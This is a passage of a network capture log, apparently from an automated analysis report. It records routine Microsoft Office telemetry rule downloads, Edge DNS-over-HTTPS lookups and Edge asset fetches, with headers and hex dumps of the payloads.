2024-11-23 06:09:41 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.6	49850	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:41 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:41 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: 9177d9ad-001e-0028-350e-3dc49f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060941Z-178bfbc474bscnbchC1NYCe7eg0000000470000000008ahg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:41 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.6	49849	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:41 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:41 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: af6ae163-c01e-0082-6735-3caf72000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060941Z-178bfbc474b7cbwqhC1NYC8z4n00000003z0000000009gne x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:41 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	49846	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:41 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-23 06:09:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:41 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: 00deeadb-901e-007b-4a91-3bac50000000 x-ms-version: 2018-03-28 x-azure-ref: 20241123T060941Z-15b8b599d882hxlwhC1TEBfa5w00000002eg0000000073ht x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-23 06:09:41 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.6	49853	162.159.61.3	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:41 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-23 06:09:41 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 01 63 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 5a 00 0c 00 56 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: cmsncom)ZV
2024-11-23 06:09:41 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Sat, 23 Nov 2024 06:09:41 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e6efdea2ae01a34-EWR alt-svc: h3=":443"; ma=86400
2024-11-23 06:09:41 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 02 00 00 00 01 01 63 03 6d 73 6e 03 63 6f 6d 00 00 01 00 01 c0 0c 00 05 00 01 00 00 53 fa 00 24 0f 63 2d 6d 73 6e 2d 63 6f 6d 2d 6e 73 61 74 63 0e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 03 6e 65 74 00 c0 27 00 01 00 01 00 00 00 0f 00 04 14 6e cd 77 00 00 29 04 d0 00 00 00 00 01 6e 00 0c 01 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: cmsncomS$c-msn-com-nsatctrafficmanagernet'nw)nj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.6	49856	13.107.246.63	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:42 UTC	470	OUT	GET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: Shoreline Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-23 06:09:42 UTC	577	IN	HTTP/1.1 200 OK Date: Sat, 23 Nov 2024 06:09:42 GMT Content-Type: application/octet-stream Content-Length: 306698 Connection: close Content-Encoding: gzip Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT ETag: 0x8DBC9B5C40EBFF4 x-ms-request-id: 671cbce7-301e-0064-5e2a-3dd8a7000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241123T060942Z-178bfbc474btrnf9hC1NYCb80g000000045000000000emkf Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-23 06:09:42 UTC	15807	IN	Data Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&\|'J'~eL\|&c~6{JAw^z3cUEeMaTu W/^~b\|X_?r~vXwW
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61 66 41 16 70 9d 0a 0c Data Ascii: u&U\h\|[T[%6Q+"PR6mU5YgV-HoB /!~qL\|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz\|PVM&UOu~{-oM5QafAp
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: b7 2c 9c d4 28 cd 82 09 ad 54 24 d2 ae 26 b9 4f 37 c4 67 1e 9d 6b d1 e4 03 44 91 0f c7 24 3e 9c a5 f8 80 ce e1 c3 bd 55 1f 7c 0d 7d f0 d6 f4 e1 f6 6d f9 6c 42 78 a7 7a 8f cf 80 2a 42 b1 ca af 46 95 01 06 85 53 be 7a 50 c8 12 ce 7e 7c 44 29 29 63 83 14 66 50 e5 69 9e ba 94 a2 14 a9 44 53 56 22 78 06 d0 d3 7d 25 3d 51 7e fc 63 e8 77 69 11 9c 24 cb 92 42 e9 e0 d4 ac cc c6 c2 0a 92 55 72 f4 61 88 91 31 1f 4c 69 b4 9b 0f a5 64 32 91 6a 99 5a 87 05 9b b8 18 4d b6 69 0c 05 60 46 80 c2 34 75 85 d5 88 cf a4 31 10 78 28 99 44 01 7e 6d 51 37 26 3d f1 aa c8 64 77 98 90 c3 4a 88 b9 d5 8c 73 bc 9b 5c 69 65 23 a6 fb 16 9b 26 25 05 ac fc cc 1e 87 56 e3 bd 7f 86 8d d9 de 4d 93 29 aa 7c fe d1 06 5b da c5 90 55 b0 c9 33 35 1b d9 51 ad b2 ea c6 9a c4 a2 90 04 54 de 86 42 2d Data Ascii: ,(T$&O7gkD$>U\|}mlBxz*BFSzP~\|D))cfPiDSV"x}%=Q~cwi$BUra1Lid2jZMi`F4u1x(D~mQ7&=dwJs\ie#&%VM)\|[U35QTB-
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 2a 42 7f 7e 14 be 1b ef d2 39 b9 d3 a0 0f a6 db fd c0 cf 6a 73 b5 e6 a0 67 39 bd 50 cf ce e5 f5 33 b4 5b f6 96 18 f6 1d 3d 5b 1c 62 ee 08 9c b4 27 31 5c bf 95 0d 07 a0 cf bc bf ec e9 f3 e3 25 7d d1 cd 7e e8 fe 69 3f 94 32 74 6d 41 40 30 f4 9d 21 ef 18 ab 09 e0 e5 30 bf 56 97 43 99 8d fb 5c b1 3a 15 2a 0c 9d 5f c9 d3 47 70 60 b0 6e 17 9c 16 bc 33 94 8f dc 87 1c 2e 65 5f 80 b0 c7 e2 bb 6a f4 3b c8 60 00 83 b2 83 02 16 e1 3f 69 68 e4 62 45 17 99 ba 9d 9d b7 00 7d 2a 5a 5f 88 af 8b 22 5d 84 79 61 b8 38 c9 2f d4 62 3c 2f ee 0a 38 04 98 69 d8 af 45 cf 43 a8 9b 3e 6e dd 69 b8 01 0b 4d c5 2a d4 d8 5d 7a b1 5f 94 d0 5d 79 e7 c9 87 c6 d5 b9 5d 89 1b 44 f3 5a 14 67 85 e9 1a ef c2 74 b9 63 86 3e c2 71 a7 08 94 eb 44 58 ad 1a 5c 09 02 5c 4d 1b c8 2c 53 c1 71 b8 50 80 Data Ascii: B~9jsg9P3[=[b'1\%}~i?2tmA@0!0VC\:_Gp`n3.e_j;`?ihbE}Z_"]ya8/b</8iEC>niM]z_]y]DZgtc>qDX\\M,SqP
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: c2 6b ad 8a 70 f5 34 6b b8 40 3f ab 6c ff 6b b9 2f c1 49 79 7f 7f fe e2 4d 8e 52 97 9f 5c d2 a4 d2 9b 7f 21 19 ca ff db 31 e3 e4 f2 51 b8 7c 74 b3 4c aa e5 59 09 49 a3 cf 51 d6 87 a5 4c 6d 23 e7 30 3b 3e ce a2 ff dd d2 a2 4d 1f 0e 14 fd d7 52 7f fd 1c ea cf 13 55 dc a3 6d 85 4b 4e 63 b4 12 03 65 33 26 36 bd 72 f4 19 04 1a d9 86 f6 84 1c dd 9e ee 21 e8 65 4d aa 2f f0 f8 0a fb d1 85 1e 53 4d 3f 5f a5 fc d4 0d f8 28 79 f7 b1 c1 a5 fc 51 df bc 30 df bf cb 6f cb 2a 09 d7 1f 99 f4 19 6a 7e d9 a5 f8 7e 7b c5 59 31 55 b2 99 9f 7d 02 06 e8 6e c6 98 ec a9 7c 3f 2a 1d 34 e5 bd 0a 8f e7 88 3e 74 c3 0b e7 6b 10 2c 4f 53 5d 7c 86 e2 09 77 99 7d ee 02 3a 9d f3 a7 29 a2 13 79 ee 15 d2 a7 37 fd 67 b6 f7 67 33 72 df b2 23 59 ef 55 5d e5 6f cb 55 7e 43 6c b7 99 fc 2e 56 9e Data Ascii: kp4k@?lk/IyMR\!1Q\|tLYIQLm#0;>MRUmKNce3&6r!eM/SM?_(yQ0oj~~{Y1U}n\|?4>tk,OS]\|w}:)y7gg3r#YU]oU~Cl.V
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 1d c0 e5 f5 0e 81 86 cd d1 7b 9c 8b 16 07 4d 31 65 8e 49 77 c3 9c 0b 06 79 cd 66 e0 72 84 3b 54 b9 74 ef 35 53 7d 3b 8c b0 a9 fd 1b 50 a9 de 74 45 72 7e 1b f0 2a c4 ee 75 56 a9 f1 4f 0b e2 ef 4c 0e 04 e6 c1 13 43 d1 a3 91 83 19 d3 3d c4 08 0f b5 d5 e1 f0 41 7b 02 cf 94 80 35 8c 5f 5f 02 90 85 fa 86 bb ab e1 02 93 a8 c3 01 b8 10 ce 1a 84 70 ba 2a 74 48 e2 74 7c 83 87 f5 42 38 70 15 c2 ce 65 08 08 86 a0 47 21 98 5b b8 58 62 21 c8 96 0d 6c 09 61 e7 32 c4 b3 5e a1 8d a0 20 7d 39 b0 28 5c c6 6d 21 84 b7 80 4c dc 70 c4 2e c4 f3 19 21 9c 8e d6 1f 96 d8 f4 9d 32 40 37 a4 47 84 1e d1 c7 65 89 5f 63 82 1d d4 5a 86 2d e5 f8 15 59 45 61 ea 67 ab 2d d9 61 85 e3 91 0f 94 e7 67 25 02 3d 4f 28 55 ad 17 c6 a0 29 6a 5d 21 2a cd 7e af 45 5e 0b 01 e5 6c bb ed 07 fa bc 5c f7 Data Ascii: {M1eIwyfr;Tt5S};PtEr~uVOLC=A{5__ptHt\|B8peG![Xb!la2^ }9(\m!Lp.!2@7Ge_cZ-YEag-ag%=O(U)j]!*~E^l\
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: b4 4f 20 01 c9 6e d7 8b d6 eb 26 ee 09 6d 06 c3 c0 20 42 f6 62 01 a8 b8 2e 41 68 d5 3e af 78 77 09 5e a1 a8 7e 3d bf 65 90 da ff 6d 58 c3 e3 86 29 f6 22 00 98 2a 9c 68 97 65 63 ac 5c ad 09 2b 23 82 8f 3f 2b 34 4c 1f 01 76 0d 06 ed 44 0f a9 a0 b1 63 30 c2 0d f2 ad 15 f9 9d a6 73 4a 64 c6 38 b2 91 d1 0a 38 ec f1 61 a5 51 a1 65 d6 96 da 34 5b b9 be df 70 92 06 98 c1 37 67 b8 7a fd 34 cd 5e 44 c0 aa b0 27 6e 0c f2 e2 f9 5e 7c 0a 17 b4 b4 16 73 66 52 b2 05 40 56 84 20 c3 90 88 0a 5a 8e f1 3d 96 59 b7 5f a7 63 31 3c 17 3a a9 04 30 4b 80 0e 09 8b 60 e1 5d df da 55 e1 6d 20 56 de 3a 5a 4e 4e 36 25 71 5c 12 7e f1 93 97 31 94 a1 29 89 f2 0a 40 a9 02 bf 55 03 2f 98 74 5f 78 73 cb c5 29 4c e9 ad ef d3 e0 e9 ec 15 b9 9a 03 cf 91 db 7e f5 f0 08 3e bd 4a a1 b3 a7 63 d1 Data Ascii: O n&m Bb.Ah>xw^~=emX)"*hec\+#?+4LvDc0sJd88aQe4[p7gz4^D'n^\|sfR@V Z=Y_c1<:0K`]Um V:ZNN6%q\~1)@U/t_xs)L~>Jc
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: e6 2c b7 a9 5c 69 a3 75 af d9 ba f6 11 ea 58 64 70 1a 03 5a 75 5c b5 f2 6d d4 e3 16 ed 7d 0a 76 94 c1 8e a7 30 9e 08 64 07 27 9d 18 c0 52 7d e4 67 ff 5d dd ba 83 b1 dc 5d 98 95 9f fd f7 4f 5a 26 c7 8a 7a a4 2b 67 ea ac d1 ee 4b f3 ee 5b 7c 55 87 5f ce 64 5a d1 d6 85 f4 9d 84 43 1d a5 d1 4e 33 c2 52 b6 ac ef d9 7f de 15 61 44 a2 b6 4f fe 03 39 27 95 29 d1 71 16 47 ff 7e 40 2f ff 09 6e 49 c5 ba 2c 58 72 fd b4 fc 2b 2f d4 a3 80 7f e2 4e fd ca 3b f8 f4 09 87 9a 38 33 24 7f 45 a2 7e d3 4f 4e 87 8c cb 8b 02 7f df 7f ff 57 75 a1 22 3d 51 a9 78 41 7d 1b c5 f8 9b d0 7f 72 fc 7d ff 85 6a 70 ab 5e dc aa 41 ca 56 bd b0 55 00 76 02 c7 a0 ea 57 7d b2 c3 fb 0a b5 58 bd 1f ab f6 63 d5 ec bd 82 b3 c7 5f d5 89 ed 15 3f f6 0a e5 7d 86 bf 7b f2 4f 82 f3 1a ea 09 06 a9 c9 03 Data Ascii: ,\iuXdpZu\m}v0d'R}g]]OZ&z+gK[\|U_dZCN3RaDO9')qG~@/nI,Xr+/N;83$E~ONWu"=QxA}r}jp^AVUvW}Xc_?}{O
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 34 82 9b a9 e1 c3 b1 e1 46 87 99 95 55 9a b4 be 3b 59 b1 6b f9 9e 4a 6a 38 c3 9d 71 93 60 68 53 6d 70 93 f4 d8 cb 92 d6 1c 64 0c 55 29 d1 f7 86 61 3a 23 da d5 06 e4 b2 85 18 31 bb 0e 46 71 38 52 33 8f 24 f5 9e 43 1a 6d 32 5a be 90 91 0a d3 47 69 32 eb 74 ec 30 03 b3 0a 2f 45 60 14 c3 56 8c 9b d3 2c f6 4c cc 87 6e 54 d0 da 28 ed 5d 8d 3a 4d 4a aa f1 2e 74 2f 9f 56 e9 a4 49 86 4c 15 33 4f 70 79 ad 9c 27 57 fe 5f f1 b5 af dc 2b a5 7e 6a ff d6 06 bc 0c 5d f6 df fe e1 b9 f2 44 21 e0 ef 42 ef 50 c9 9d 6d c4 b7 e0 a2 c1 1c b4 2f 36 29 c7 0d cd c5 5f 01 b2 80 f3 b0 10 3b 89 01 c5 9d d8 7c 07 2e 18 db 27 d6 4f f2 63 9c b0 f6 f2 ae c9 8b 6c b2 c4 37 76 c1 ad 55 68 26 ab 9f 6e 0d f6 97 8b d0 7b ae f0 47 ed 5d 9f e5 af 8e d0 8d 25 c1 76 f1 dc 48 82 c0 c8 4e c8 12 40 Data Ascii: 4FU;YkJj8q`hSmpdU)a:#1Fq8R3$Cm2ZGi2t0/E`V,LnT(]:MJ.t/VIL3Opy'W_+~j]D!BPm/6)_;\|.'Ocl7vUh&n{G]%vHN@
2024-11-23 06:09:43 UTC	16384	IN	Data Raw: 14 85 b6 9f 56 47 3e e9 1b d3 5f a5 ac 50 c3 87 e4 2f 7d 48 49 98 d9 64 0e 08 ef 71 ff 50 b9 f3 86 37 4a 22 88 52 55 4a 91 92 53 0e 3c c2 3f 65 33 a3 28 fd 5a 9a 2e 91 76 ec f5 34 94 dc 1a 84 a2 be c1 0e 7a 8b 67 39 3e 58 c7 23 2c 7e 30 2a a9 04 8f 00 e5 ea b9 90 8e 19 22 31 4f 88 ac 1a 1f 76 bd 44 ab b4 23 ff 6a 0e 16 d3 4b 19 b1 5f 46 1a 8c 28 02 0b 82 4d 75 9f bc a7 ab d3 c0 ac 12 2c 1a e1 ca 61 62 a5 73 bf 90 ea 26 30 cc b6 60 ae a5 03 4b 60 ea 7c b9 bf 27 e4 0d 14 35 5a 3a 2d d3 09 b2 1d da a4 23 ee 1b c6 42 eb 6f 46 58 98 31 2d 33 81 d2 c7 b9 ea 4a e4 45 53 f8 1b 85 d6 9a f9 1c dd e5 4a cf 08 96 59 af e8 ce 28 b3 02 0e 0d ee 14 62 4a 58 2a 40 44 d3 12 5b 39 93 33 26 50 17 82 cc e2 88 1a 71 ab dd fe 3c 12 6a 79 40 5e 32 8d a6 25 53 15 5e 3f 60 3e a6 Data Ascii: VG>_P/}HIdqP7J"RUJS<?e3(Z.v4zg9>X#,~0"1OvD#jK_F(Mu,abs&0`K`\|'5Z:-#BoFX1-3JESJY(bJX@D[93&Pq<jy@^2%S^?`>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
91	192.168.2.6	49855	13.107.246.63	443	7312	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-23 06:09:42 UTC	711	OUT	GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Edge-Asset-Group: EntityExtractionDomainsConfig Sec-Mesh-Client-Edge-Version: 117.0.2045.55 Sec-Mesh-Client-Edge-Channel: stable Sec-Mesh-Client-OS: Windows Sec-Mesh-Client-OS-Version: 10.0.19045 Sec-Mesh-Client-Arch: x86_64 Sec-Mesh-Client-WebView: 0 Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
